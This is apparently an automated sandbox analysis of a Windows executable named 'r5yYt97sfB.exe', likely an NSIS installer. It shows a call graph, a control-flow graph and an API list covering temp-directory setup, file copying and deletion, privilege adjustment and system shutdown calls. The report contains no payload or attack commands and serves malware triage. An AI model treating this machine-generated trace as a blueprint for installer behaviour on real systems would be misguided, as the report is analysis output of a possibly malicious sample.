402bbf 18 API calls 3415->3416 3417 401e20 3416->3417 3418 402bbf 18 API calls 3417->3418 3419 401e29 3418->3419 3420 401423 25 API calls 3419->3420 3421 401e30 ShellExecuteW 3420->3421 3422 401e61 3421->3422 4519 40398a 4520 403995 4519->4520 4521 40399c GlobalAlloc 4520->4521 4522 403999 4520->4522 4521->4522 4523 401491 4524 4052e2 25 API calls 4523->4524 4525 401498 4524->4525 3543 402095 3544 402bbf 18 API calls 3543->3544 3545 40209c 3544->3545 3546 402bbf 18 API calls 3545->3546 3547 4020a6 3546->3547 3548 402bbf 18 API calls 3547->3548 3549 4020b0 3548->3549 3550 402bbf 18 API calls 3549->3550 3551 4020ba 3550->3551 3552 402bbf 18 API calls 3551->3552 3554 4020c4 3552->3554 3553 402103 CoCreateInstance 3558 402122 3553->3558 3554->3553 3555 402bbf 18 API calls 3554->3555 3555->3553 3556 401423 25 API calls 3557 4021e1 3556->3557 3558->3556 3558->3557 4533 401a15 4534 402bbf 18 API calls 4533->4534 4535 401a1e ExpandEnvironmentStringsW 4534->4535 4536 401a32 4535->4536 4538 401a45 4535->4538 4537 401a37 lstrcmpW 4536->4537 4536->4538 4537->4538 4539 402515 4540 402bbf 18 API calls 4539->4540 4541 40251c 4540->4541 4544 405d58 GetFileAttributesW CreateFileW 4541->4544 4543 402528 4544->4543 4545 404395 lstrlenW 4546 4043b4 4545->4546 4547 4043b6 WideCharToMultiByte 4545->4547 4546->4547 4548 401b16 4549 402bbf 18 API calls 4548->4549 4550 401b1d 4549->4550 4551 402ba2 18 API calls 4550->4551 4552 401b26 wsprintfW 4551->4552 4553 402a4c 4552->4553 4554 40469b 4555 4046d1 4554->4555 4556 4046ab 4554->4556 4558 4042ae 8 API calls 4555->4558 4557 404247 19 API calls 4556->4557 4559 4046b8 SetDlgItemTextW 4557->4559 4560 4046dd 4558->4560 4559->4555 4561 40159b 4562 402bbf 18 API calls 4561->4562 4563 4015a2 SetFileAttributesW 4562->4563 4564 4015b4 4563->4564 3980 40229d 3981 4022a5 3980->3981 3982 4022ab 3980->3982 3984 402bbf 18 API calls 3981->3984 3983 4022b9 3982->3983 3985 402bbf 18 API calls 3982->3985 3986 4022c7 3983->3986 3987 402bbf 18 API calls 3983->3987 3984->3982 3985->3983 3988 402bbf 18 API calls 3986->3988 3987->3986 3989 4022d0 WritePrivateProfileStringW 3988->3989 4565 401f1d 4566 402bbf 18 API calls 4565->4566 4567 401f24 4566->4567 4568 406559 5 API calls 4567->4568 4569 401f33 4568->4569 4570 401fb7 4569->4570 4571 401f4f GlobalAlloc 4569->4571 4571->4570 4572 401f63 4571->4572 4573 406559 5 API calls 4572->4573 4574 401f6a 4573->4574 4575 406559 5 API calls 4574->4575 4576 401f74 4575->4576 4576->4570 4580 4060ca wsprintfW 4576->4580 4578 401fa9 4581 4060ca wsprintfW 4578->4581 4580->4578 4581->4570 3990 40249e 3991 402cc9 19 API calls 3990->3991 3992 4024a8 3991->3992 3993 402ba2 18 API calls 3992->3993 3994 4024b1 3993->3994 3995 4024bc 3994->3995 3999 40281e 3994->3999 3996 4024d5 RegEnumValueW 3995->3996 3997 4024c9 RegEnumKeyW 3995->3997 3998 4024ee RegCloseKey 3996->3998 3996->3999 3997->3998 3998->3999 4582 40149e 4583 4014ac PostQuitMessage 4582->4583 4584 402288 4582->4584 4583->4584 4001 40231f 4002 402324 4001->4002 4003 40234f 4001->4003 4004 402cc9 19 API calls 4002->4004 4005 402bbf 18 API calls 4003->4005 4006 40232b 4004->4006 4007 402356 4005->4007 4008 402335 4006->4008 4012 40236c 4006->4012 4013 402bff RegOpenKeyExW 4007->4013 4009 402bbf 18 API calls 4008->4009 4010 40233c RegDeleteValueW RegCloseKey 4009->4010 4010->4012 4014 402c93 4013->4014 4015 402c2a 4013->4015 4014->4012 4016 402c50 RegEnumKeyW 4015->4016 4017 402c62 RegCloseKey 4015->4017 4019 402c87 RegCloseKey 4015->4019 4022 402bff 5 API calls 4015->4022 4016->4015 4016->4017 4018 406559 5 API calls 4017->4018 4020 402c72 4018->4020 4021 402c76 4019->4021 4020->4021 4023 402ca2 RegDeleteKeyW 4020->4023 4021->4014 4022->4015 4023->4021 3106 405421 3107 405442 GetDlgItem GetDlgItem GetDlgItem 3106->3107 3108 4055cb 3106->3108 3151 40427c SendMessageW 3107->3151 3110 4055d4 GetDlgItem CreateThread CloseHandle 3108->3110 3111 4055fc 3108->3111 3110->3111 3224 4053b5 OleInitialize 3110->3224 3113 405613 ShowWindow ShowWindow 3111->3113 3114 40564c 3111->3114 3115 405627 3111->3115 3112 4054b2 3118 4054b9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3112->3118 3156 40427c SendMessageW 3113->3156 3160 4042ae 3114->3160 3116 405687 3115->3116 3120 405661 ShowWindow 3115->3120 3121 40563b 3115->3121 3116->3114 3127 405695 SendMessageW 3116->3127 3125 405527 3118->3125 3126 40550b SendMessageW SendMessageW 3118->3126 3123 405681 3120->3123 3124 405673 3120->3124 3157 404220 3121->3157 3122 40565a 3130 404220 SendMessageW 3123->3130 3174 4052e2 3124->3174 3131 40553a 3125->3131 3132 40552c SendMessageW 3125->3132 3126->3125 3127->3122 3133 4056ae CreatePopupMenu 3127->3133 3130->3116 3152 404247 3131->3152 3132->3131 3185 4061a5 3133->3185 3137 40554a 3140 405553 ShowWindow 3137->3140 3141 405587 GetDlgItem SendMessageW 3137->3141 3138 4056db GetWindowRect 3139 4056ee TrackPopupMenu 3138->3139 3139->3122 3142 405709 3139->3142 3143 405576 3140->3143 3144 405569 ShowWindow 3140->3144 3141->3122 3145 4055ae SendMessageW SendMessageW 3141->3145 3146 405725 SendMessageW 3142->3146 3155 40427c SendMessageW 3143->3155 3144->3143 3145->3122 3146->3146 3147 405742 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3146->3147 3149 405767 SendMessageW 3147->3149 3149->3149 3150 405790 GlobalUnlock SetClipboardData CloseClipboard 3149->3150 3150->3122 3151->3112 3153 4061a5 18 API calls 3152->3153 3154 404252 SetDlgItemTextW 3153->3154 3154->3137 3155->3141 3156->3115 3158 404227 3157->3158 3159 40422d SendMessageW 3157->3159 3158->3159 3159->3114 3161 4042c6 GetWindowLongW 3160->3161 3162 40434f 3160->3162 3161->3162 3163 4042d7 3161->3163 3162->3122 3164 4042e6 GetSysColor 3163->3164 3165 4042e9 3163->3165 3164->3165 3166 4042f9 SetBkMode 3165->3166 3167 4042ef SetTextColor 3165->3167 3168 404311 GetSysColor 3166->3168 3169 404317 3166->3169 3167->3166 3168->3169 3170 404328 3169->3170 3171 40431e SetBkColor 3169->3171 3170->3162 3172 404342 CreateBrushIndirect 3170->3172 3173 40433b DeleteObject 3170->3173 3171->3170 3172->3162 3173->3172 3175 4052fd 3174->3175 3176 40539f 3174->3176 3177 405319 lstrlenW 3175->3177 3178 4061a5 18 API calls 3175->3178 3176->3123 3179 405342 3177->3179 3180 405327 lstrlenW 3177->3180 3178->3177 3182 405355 3179->3182 3183 405348 SetWindowTextW 3179->3183 3180->3176 3181 405339 lstrcatW 3180->3181 3181->3179 3182->3176 3184 40535b SendMessageW SendMessageW SendMessageW 3182->3184 3183->3182 3184->3176 3190 4061b2 3185->3190 3186 4063fd 3187 4056be AppendMenuW 3186->3187 3219 406183 lstrcpynW 3186->3219 3187->3138 3187->3139 3189 406265 GetVersion 3189->3190 3190->3186 3190->3189 3191 4063cb lstrlenW 3190->3191 3194 4061a5 10 API calls 3190->3194 3196 4062e0 GetSystemDirectoryW 3190->3196 3197 4062f3 GetWindowsDirectoryW 3190->3197 3199 406327 SHGetSpecialFolderLocation 3190->3199 3200 4061a5 10 API calls 3190->3200 3201 40636c lstrcatW 3190->3201 3203 406050 RegOpenKeyExW 3190->3203 3208 406417 3190->3208 3217 4060ca wsprintfW 3190->3217 3218 406183 lstrcpynW 3190->3218 3191->3190 3194->3191 3196->3190 3197->3190 3199->3190 3202 40633f SHGetPathFromIDListW CoTaskMemFree 3199->3202 3200->3190 3201->3190 3202->3190 3204 4060c4 3203->3204 3205 406084 RegQueryValueExW 3203->3205 3204->3190 3206 4060a5 RegCloseKey 3205->3206 3206->3204 3215 406424 3208->3215 3209 40649a 3210 40649f CharPrevW 3209->3210 3212 4064c0 3209->3212 3210->3209 3211 40648d CharNextW 3211->3209 3211->3215 3212->3190 3214 406479 CharNextW 3214->3215 3215->3209 3215->3211 3215->3214 3216 406488 CharNextW 3215->3216 3220 405b64 3215->3220 3216->3211 3217->3190 3218->3190 3219->3187 3221 405b6a 3220->3221 3222 405b80 3221->3222 3223 405b71 CharNextW 3221->3223 3222->3215 3223->3221 3231 404293 3224->3231 3226 404293 SendMessageW 3227 405411 OleUninitialize 3226->3227 3228 4053d8 3230 4053ff 3228->3230 3234 401389 3228->3234 3230->3226 3232 4042ab 3231->3232 3233 40429c SendMessageW 3231->3233 3232->3228 3233->3232 3236 401390 3234->3236 3235 4013fe 3235->3228 3236->3235 3237 4013cb MulDiv SendMessageW 3236->3237 3237->3236 4585 401ca3 4586 402ba2 18 API calls 4585->4586 4587 401ca9 IsWindow 4586->4587 4588 401a05 4587->4588 4589 402a27 SendMessageW 4590 402a41 InvalidateRect 4589->4590 4591 402a4c 4589->4591 4590->4591 3438 40242a 3449 402cc9 3438->3449 3440 402434 3441 402bbf 18 API calls 3440->3441 3442 40243d 3441->3442 3443 402448 RegQueryValueExW 3442->3443 3446 40281e 3442->3446 3444 402468 3443->3444 3445 40246e RegCloseKey 3443->3445 3444->3445 3453 4060ca wsprintfW 3444->3453 3445->3446 3450 402bbf 18 API calls 3449->3450 3451 402ce2 3450->3451 3452 402cf0 RegOpenKeyExW 3451->3452 3452->3440 3453->3445 4599 40172d 4600 402bbf 18 API calls 4599->4600 4601 401734 SearchPathW 4600->4601 4602 40174f 4601->4602 4603 4027b4 4604 4027ba 4603->4604 4605 4027c2 FindClose 4604->4605 4606 402a4c 4604->4606 4605->4606 3559 4033b6 SetErrorMode GetVersion 3560 4033ea 3559->3560 3561 4033f0 3559->3561 3562 406559 5 API calls 3560->3562 3650 4064ed GetSystemDirectoryW 3561->3650 3562->3561 3564 403407 3565 4064ed 3 API calls 3564->3565 3566 403411 3565->3566 3567 4064ed 3 API calls 3566->3567 3568 40341b 3567->3568 3653 406559 GetModuleHandleA 3568->3653 3571 406559 5 API calls 3572 403429 #17 OleInitialize SHGetFileInfoW 3571->3572 3659 406183 lstrcpynW 3572->3659 3574 403466 GetCommandLineW 3660 406183 lstrcpynW 3574->3660 3576 403478 GetModuleHandleW 3577 403490 3576->3577 3578 405b64 CharNextW 3577->3578 3579 40349f CharNextW 3578->3579 3580 4035ca GetTempPathW 3579->3580 3587 4034b8 3579->3587 3661 403385 3580->3661 3582 4035e2 3583 4035e6 GetWindowsDirectoryW lstrcatW 3582->3583 3584 40363c DeleteFileW 3582->3584 3588 403385 12 API calls 3583->3588 3671 402e41 GetTickCount GetModuleFileNameW 3584->3671 3585 405b64 CharNextW 3585->3587 3587->3585 3593 4035b5 3587->3593 3595 4035b3 3587->3595 3590 403602 3588->3590 3589 403650 3591 403703 3589->3591 3596 4036f3 3589->3596 3600 405b64 CharNextW 3589->3600 3590->3584 3592 403606 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3590->3592 3774 4038da 3591->3774 3594 403385 12 API calls 3592->3594 3757 406183 lstrcpynW 3593->3757 3598 403634 3594->3598 3595->3580 3701 4039cc 3596->3701 3598->3584 3598->3591 3617 40366f 3600->3617 3603 40383e 3605 4038c2 ExitProcess 3603->3605 3606 403846 GetCurrentProcess OpenProcessToken 3603->3606 3604 40371e 3607 4058c8 MessageBoxIndirectW 3604->3607 3608 403892 3606->3608 3609 40385e LookupPrivilegeValueW AdjustTokenPrivileges 3606->3609 3613 40372c ExitProcess 3607->3613 3616 406559 5 API calls 3608->3616 3609->3608 3611 403734 3783 40584b 3611->3783 3612 4036cd 3758 405c3f 3612->3758 3620 403899 3616->3620 3617->3611 3617->3612 3623 4038ae ExitWindowsEx 3620->3623 3626 4038bb 3620->3626 3621 403755 lstrcatW lstrcmpiW 3621->3591 3625 403771 3621->3625 3622 40374a lstrcatW 3622->3621 3623->3605 3623->3626 3628 403776 3625->3628 3629 40377d 3625->3629 3630 40140b 2 API calls 3626->3630 3627 4036e8 3773 406183 lstrcpynW 3627->3773 3786 4057b1 CreateDirectoryW 3628->3786 3791 40582e CreateDirectoryW 3629->3791 3630->3605 3635 403782 SetCurrentDirectoryW 3636 403792 3635->3636 3637 40379d 3635->3637 3794 406183 lstrcpynW 3636->3794 3795 406183 lstrcpynW 3637->3795 3640 4061a5 18 API calls 3641 4037dc DeleteFileW 3640->3641 3642 4037e9 CopyFileW 3641->3642 3647 4037ab 3641->3647 3642->3647 3643 403832 3645 406024 38 API calls 3643->3645 3645->3591 3646 4061a5 18 API calls 3646->3647 3647->3640 3647->3643 3647->3646 3648 405863 2 API calls 3647->3648 3649 40381d CloseHandle 3647->3649 3796 406024 MoveFileExW 3647->3796 3648->3647 3649->3647 3651 40650f wsprintfW LoadLibraryW 3650->3651 3651->3564 3654 406575 3653->3654 3655 40657f GetProcAddress 3653->3655 3656 4064ed 3 API calls 3654->3656 3657 403422 3655->3657 3658 40657b 3656->3658 3657->3571 3658->3655 3658->3657 3659->3574 3660->3576 3662 406417 5 API calls 3661->3662 3663 403391 3662->3663 3664 40339b 3663->3664 3665 405b37 3 API calls 3663->3665 3664->3582 3666 4033a3 3665->3666 3667 40582e 2 API calls 3666->3667 3668 4033a9 3667->3668 3669 405d87 2 API calls 3668->3669 3670 4033b4 3669->3670 3670->3582 3800 405d58 GetFileAttributesW CreateFileW 3671->3800 3673 402e84 3700 402e91 3673->3700 3801 406183 lstrcpynW 3673->3801 3675 402ea7 3802 405b83 lstrlenW 3675->3802 3679 402eb8 GetFileSize 3680 402fb9 3679->3680 3698 402ecf 3679->3698 3681 402d9f 33 API calls 3680->3681 3683 402fc0 3681->3683 3682 403358 ReadFile 3682->3698 3685 402ffc GlobalAlloc 3683->3685 3683->3700 3808 40336e SetFilePointer 3683->3808 3684 403054 3687 402d9f 33 API calls 3684->3687 3686 403013 3685->3686 3692 405d87 2 API calls 3686->3692 3687->3700 3689 402fdd 3690 403358 ReadFile 3689->3690 3693 402fe8 3690->3693 3691 402d9f 33 API calls 3691->3698 3694 403024 CreateFileW 3692->3694 3693->3685 3693->3700 3695 40305e 3694->3695 3694->3700 3807 40336e SetFilePointer 3695->3807 3697 40306c 3699 4030e7 45 API calls 3697->3699 3698->3680 3698->3682 3698->3684 3698->3691 3698->3700 3699->3700 3700->3589 3702 406559 5 API calls 3701->3702 3703 4039e0 3702->3703 3704 4039e6 3703->3704 3705 4039f8 3703->3705 3818 4060ca wsprintfW 3704->3818 3706 406050 3 API calls 3705->3706 3707 403a28 3706->3707 3709 403a47 lstrcatW 3707->3709 3711 406050 3 API calls 3707->3711 3710 4039f6 3709->3710 3809 403ca2 3710->3809 3711->3709 3714 405c3f 18 API calls 3715 403a79 3714->3715 3716 403b0d 3715->3716 3718 406050 3 API calls 3715->3718 3717 405c3f 18 API calls 3716->3717 3719 403b13 3717->3719 3725 403aab 3718->3725 3720 403b23 LoadImageW 3719->3720 3721 4061a5 18 API calls 3719->3721 3722 403bc9 3720->3722 3723 403b4a RegisterClassW 3720->3723 3721->3720 3727 40140b 2 API calls 3722->3727 3726 403b80 SystemParametersInfoW CreateWindowExW 3723->3726 3756 403bd3 3723->3756 3724 403acc lstrlenW 3729 403b00 3724->3729 3730 403ada lstrcmpiW 3724->3730 3725->3716 3725->3724 3728 405b64 CharNextW 3725->3728 3726->3722 3731 403bcf 3727->3731 3732 403ac9 3728->3732 3734 405b37 3 API calls 3729->3734 3730->3729 3733 403aea GetFileAttributesW 3730->3733 3737 403ca2 19 API calls 3731->3737 3731->3756 3732->3724 3736 403af6 3733->3736 3735 403b06 3734->3735 3819 406183 lstrcpynW 3735->3819 3736->3729 3740 405b83 2 API calls 3736->3740 3738 403be0 3737->3738 3741 403bec ShowWindow 3738->3741 3742 403c6f 3738->3742 3740->3729 3743 4064ed 3 API calls 3741->3743 3744 4053b5 5 API calls 3742->3744 3745 403c04 3743->3745 3746 403c75 3744->3746 3749 403c12 GetClassInfoW 3745->3749 3751 4064ed 3 API calls 3745->3751 3747 403c91 3746->3747 3748 403c79 3746->3748 3750 40140b 2 API calls 3747->3750 3754 40140b 2 API calls 3748->3754 3748->3756 3752 403c26 GetClassInfoW RegisterClassW 3749->3752 3753 403c3c DialogBoxParamW 3749->3753 3750->3756 3751->3749 3752->3753 3755 40140b 2 API calls 3753->3755 3754->3756 3755->3756 3756->3591 3757->3595 3821 406183 lstrcpynW 3758->3821 3760 405c50 3822 405be2 CharNextW CharNextW 3760->3822 3763 4036d9 3763->3591 3772 406183 lstrcpynW 3763->3772 3764 406417 5 API calls 3770 405c66 3764->3770 3765 405c97 lstrlenW 3766 405ca2 3765->3766 3765->3770 3767 405b37 3 API calls 3766->3767 3769 405ca7 GetFileAttributesW 3767->3769 3768 4064c6 2 API calls 3768->3770 3769->3763 3770->3763 3770->3765 3770->3768 3771 405b83 2 API calls 3770->3771 3771->3765 3772->3627 3773->3596 3775 4038f5 3774->3775 3776 4038eb CloseHandle 3774->3776 3777 403909 3775->3777 3778 4038ff CloseHandle 3775->3778 3776->3775 3828 403937 3777->3828 3778->3777 3784 406559 5 API calls 3783->3784 3785 403739 lstrcatW 3784->3785 3785->3621 3785->3622 3787 405802 GetLastError 3786->3787 3788 40377b 3786->3788 3787->3788 3789 405811 SetFileSecurityW 3787->3789 3788->3635 3789->3788 3790 405827 GetLastError 3789->3790 3790->3788 3792 405842 GetLastError 3791->3792 3793 40583e 3791->3793 3792->3793 3793->3635 3794->3637 3795->3647 3797 406038 3796->3797 3799 406045 3796->3799 3882 405eb2 lstrcpyW 3797->3882 3799->3647 3800->3673 3801->3675 3803 405b91 3802->3803 3804 402ead 3803->3804 3805 405b97 CharPrevW 3803->3805 3806 406183 lstrcpynW 3804->3806 3805->3803 3805->3804 3806->3679 3807->3697 3808->3689 3810 403cb6 3809->3810 3820 4060ca wsprintfW 3810->3820 3812 403d27 3813 4061a5 18 API calls 3812->3813 3814 403d33 SetWindowTextW 3813->3814 3815 403a57 3814->3815 3816 403d4f 3814->3816 3815->3714 3816->3815 3817 4061a5 18 API calls 3816->3817 3817->3816 3818->3710 3819->3716 3820->3812 3821->3760 3823 405bff 3822->3823 3825 405c11 3822->3825 3823->3825 3826 405c0c CharNextW 3823->3826 3824 405c35 3824->3763 3824->3764 3825->3824 3827 405b64 CharNextW 3825->3827 3826->3824 3827->3825 3829 403945 3828->3829 3830 40390e 3829->3830 3831 40394a FreeLibrary GlobalFree 3829->3831 3832 405974 3830->3832 3831->3830 3831->3831 3833 405c3f 18 API calls 3832->3833 3834 405994 3833->3834 3835 4059b3 3834->3835 3836 40599c DeleteFileW 3834->3836 3839 405ade 3835->3839 3872 406183 lstrcpynW 3835->3872 3837 40370c OleUninitialize 3836->3837 3837->3603 3837->3604 3839->3837 3845 4064c6 2 API calls 3839->3845 3840 4059d9 3841 4059ec 3840->3841 3842 4059df lstrcatW 3840->3842 3844 405b83 2 API calls 3841->3844 3843 4059f2 3842->3843 3846 405a02 lstrcatW 3843->3846 3847 4059f8 3843->3847 3844->3843 3848 405af8 3845->3848 3849 405a0d lstrlenW FindFirstFileW 3846->3849 3847->3846 3847->3849 3848->3837 3850 405afc 3848->3850 3851 405ad3 3849->3851 3870 405a2f 3849->3870 3852 405b37 3 API calls 3850->3852 3851->3839 3853 405b02 3852->3853 3855 40592c 5 API calls 3853->3855 3854 405ab6 FindNextFileW 3857 405acc FindClose 3854->3857 3854->3870 3858 405b0e 3855->3858 3857->3851 3859 405b12 3858->3859 3860 405b28 3858->3860 3859->3837 3863 4052e2 25 API calls 3859->3863 3862 4052e2 25 API calls 3860->3862 3862->3837 3865 405b1f 3863->3865 3864 405974 62 API calls 3864->3870 3867 406024 38 API calls 3865->3867 3866 4052e2 25 API calls 3866->3854 3868 405b26 3867->3868 3868->3837 3869 4052e2 25 API calls 3869->3870 3870->3854 3870->3864 3870->3866 3870->3869 3871 406024 38 API calls 3870->3871 3873 406183 lstrcpynW 3870->3873 3874 40592c 3870->3874 3871->3870 3872->3840 3873->3870 3875 405d33 2 API calls 3874->3875 3876 405938 3875->3876 3877 405947 RemoveDirectoryW 3876->3877 3878 40594f DeleteFileW 3876->3878 3880 405959 3876->3880 3879 405955 3877->3879 3878->3879 3879->3880 3881 405965 SetFileAttributesW 3879->3881 3880->3870 3881->3880 3883 405f00 GetShortPathNameW 3882->3883 3884 405eda 3882->3884 3886 405f15 3883->3886 3887 40601f 3883->3887 3909 405d58 GetFileAttributesW CreateFileW 3884->3909 3886->3887 3889 405f1d wsprintfA 3886->3889 3887->3799 3888 405ee4 CloseHandle GetShortPathNameW 3888->3887 3890 405ef8 3888->3890 3891 4061a5 18 API calls 3889->3891 3890->3883 3890->3887 3892 405f45 3891->3892 3910 405d58 GetFileAttributesW CreateFileW 3892->3910 3894 405f52 3894->3887 3895 405f61 GetFileSize GlobalAlloc 3894->3895 3896 405f83 3895->3896 3897 406018 CloseHandle 3895->3897 3898 405ddb ReadFile 3896->3898 3897->3887 3899 405f8b 3898->3899 3899->3897 3911 405cbd lstrlenA 3899->3911 3902 405fa2 lstrcpyA 3906 405fc4 3902->3906 3903 405fb6 3904 405cbd 4 API calls 3903->3904 3904->3906 3905 405ffb SetFilePointer 3907 405e0a WriteFile 3905->3907 3906->3905 3908 406011 GlobalFree 3907->3908 3908->3897 3909->3888 3910->3894 3912 405cfe lstrlenA 3911->3912 3913 405d06 3912->3913 3914 405cd7 lstrcmpiA 3912->3914 3913->3902 3913->3903 3914->3913 3915 405cf5 CharNextA 3914->3915 3915->3912 4607 401b37 4608 401b44 4607->4608 4609 401b88 4607->4609 4612 401bcd 4608->4612 4617 401b5b 4608->4617 4610 401bb2 GlobalAlloc 4609->4610 4611 401b8d 4609->4611 4613 4061a5 18 API calls 4610->4613 4625 402288 4611->4625 4628 406183 lstrcpynW 4611->4628 4614 4061a5 18 API calls 4612->4614 4612->4625 4613->4612 4616 402282 4614->4616 4620 4058c8 MessageBoxIndirectW 4616->4620 4626 406183 lstrcpynW 4617->4626 4618 401b9f GlobalFree 4618->4625 4620->4625 4621 401b6a 4627 406183 lstrcpynW 4621->4627 4623 401b79 4629 406183 lstrcpynW 4623->4629 4626->4621 4627->4623 4628->4618 4629->4625 4630 402537 4631 402562 4630->4631 4632 40254b 4630->4632 4634 402596 4631->4634 4635 402567 4631->4635 4633 402ba2 18 API calls 4632->4633 4642 402552 4633->4642 4637 402bbf 18 API calls 4634->4637 4636 402bbf 18 API calls 4635->4636 4638 40256e WideCharToMultiByte lstrlenA 4636->4638 4639 40259d lstrlenW 4637->4639 4638->4642 4639->4642 4640 4025e0 4641 405e0a WriteFile 4641->4640 4642->4640 4643 405e39 5 API calls 4642->4643 4644 4025ca 4642->4644 4643->4644 4644->4640 4644->4641 4645 404a38 4646 404a64 4645->4646 4647 404a48 4645->4647 4649 404a97 4646->4649 4650 404a6a SHGetPathFromIDListW 4646->4650 4656 4058ac GetDlgItemTextW 4647->4656 4652 404a81 SendMessageW 4650->4652 4653 404a7a 4650->4653 4651 404a55 SendMessageW 4651->4646 4652->4649 4655 40140b 2 API calls 4653->4655 4655->4652 4656->4651 4657 4014b8 4658 4014be 4657->4658 4659 401389 2 API calls 4658->4659 4660 4014c6 4659->4660 3916 4015b9 3917 402bbf 18 API calls 3916->3917 3918 4015c0 3917->3918 3919 405be2 4 API calls 3918->3919 3932 4015c9 3919->3932 3920 401629 3922 40165b 3920->3922 3923 40162e 3920->3923 3921 405b64 CharNextW 3921->3932 3925 401423 25 API calls 3922->3925 3924 401423 25 API calls 3923->3924 3926 401635 3924->3926 3931 401653 3925->3931 3935 406183 lstrcpynW 3926->3935 3927 40582e 2 API calls 3927->3932 3929 401642 SetCurrentDirectoryW 3929->3931 3930 40584b 5 API calls 3930->3932 3932->3920 3932->3921 3932->3927 3932->3930 3933 40160f GetFileAttributesW 3932->3933 3934 4057b1 4 API calls 3932->3934 3933->3932 3934->3932 3935->3929 4668 40293b 4669 402ba2 18 API calls 4668->4669 4670 402941 4669->4670 4671 402964 4670->4671 4672 40297d 4670->4672 4677 40281e 4670->4677 4675 402969 4671->4675 4676 40297a 4671->4676 4673 402993 4672->4673 4674 402987 4672->4674 4679 4061a5 18 API calls 4673->4679 4678 402ba2 18 API calls 4674->4678 4682 406183 lstrcpynW 4675->4682 4683 4060ca wsprintfW 4676->4683 4678->4677 4679->4677 4682->4677 4683->4677

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 4033b6-4033e8 SetErrorMode GetVersion 1 4033ea-4033f2 call 406559 0->1 2 4033fb-40348e call 4064ed * 3 call 406559 * 2 #17 OleInitialize SHGetFileInfoW call 406183 GetCommandLineW call 406183 GetModuleHandleW 0->2 1->2 8 4033f4 1->8 20 403490-403497 2->20 21 403498-4034b2 call 405b64 CharNextW 2->21 8->2 20->21 24 4034b8-4034be 21->24 25 4035ca-4035e4 GetTempPathW call 403385 21->25 26 4034c0-4034c5 24->26 27 4034c7-4034cd 24->27 34 4035e6-403604 GetWindowsDirectoryW lstrcatW call 403385 25->34 35 40363c-403656 DeleteFileW call 402e41 25->35 26->26 26->27 29 4034d4-4034d8 27->29 30 4034cf-4034d3 27->30 32 403596-4035a3 call 405b64 29->32 33 4034de-4034e4 29->33 30->29 48 4035a5-4035a6 32->48 49 4035a7-4035ad 32->49 38 4034e6-4034ed 33->38 39 4034fe-403537 33->39 34->35 54 403606-403636 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403385 34->54 50 403707-403718 call 4038da OleUninitialize 35->50 51 40365c-403662 35->51 43 4034f4 38->43 44 4034ef-4034f2 38->44 45 403554-40358e 39->45 46 403539-40353e 39->46 43->39 44->39 44->43 45->32 53 403590-403594 45->53 46->45 52 403540-403548 46->52 48->49 49->24 57 4035b3 49->57 71 40383e-403844 50->71 72 40371e-40372e call 4058c8 ExitProcess 50->72 58 4036f7-4036fe call 4039cc 51->58 59 403668-403673 call 405b64 51->59 61 40354a-40354d 52->61 62 40354f 52->62 53->32 55 4035b5-4035c3 call 406183 53->55 54->35 54->50 64 4035c8 55->64 57->64 70 403703 58->70 75 4036c1-4036cb 59->75 76 403675-4036aa 59->76 61->45 61->62 62->45 64->25 70->50 73 4038c2-4038ca 71->73 74 403846-40385c GetCurrentProcess OpenProcessToken 71->74 81 4038d0-4038d4 ExitProcess 73->81 82 4038cc 73->82 78 403892-4038a0 call 406559 74->78 79 40385e-40388c LookupPrivilegeValueW AdjustTokenPrivileges 74->79 83 403734-403748 call 40584b lstrcatW 75->83 84 4036cd-4036db call 405c3f 75->84 80 4036ac-4036b0 76->80 98 4038a2-4038ac 78->98 99 4038ae-4038b9 ExitWindowsEx 78->99 79->78 89 4036b2-4036b7 80->89 90 4036b9-4036bd 80->90 82->81 96 403755-40376f lstrcatW lstrcmpiW 83->96 97 40374a-403750 lstrcatW 83->97 84->50 95 4036dd-4036f3 call 406183 * 2 84->95 89->90 94 4036bf 89->94 90->80 90->94 94->75 95->58 96->50 101 403771-403774 96->101 97->96 98->99 102 4038bb-4038bd call 40140b 98->102 99->73 99->102 104 403776-40377b call 4057b1 101->104 105 40377d call 40582e 101->105 102->73 113 403782-403790 SetCurrentDirectoryW 104->113 105->113 114 403792-403798 call 406183 113->114 115 40379d-4037c6 call 406183 113->115 114->115 119 4037cb-4037e7 call 4061a5 DeleteFileW 115->119 122 403828-403830 119->122 123 4037e9-4037f9 CopyFileW 119->123 122->119 125 403832-403839 call 406024 122->125 123->122 124 4037fb-40381b call 406024 call 4061a5 call 405863 123->124 124->122 134 40381d-403824 CloseHandle 124->134 125->50 134->122
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNELBASE ref: 004033D8
                                                                                                                                              • GetVersion.KERNEL32 ref: 004033DE
                                                                                                                                              • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040342E
                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403435
                                                                                                                                              • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403451
                                                                                                                                              • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 00403466
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\r5yYt97sfB.exe",00000000), ref: 00403479
                                                                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\r5yYt97sfB.exe",00000020), ref: 004034A0
                                                                                                                                                • Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                                                                • Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\), ref: 004035DB
                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004035EC
                                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004035F8
                                                                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040360C
                                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403614
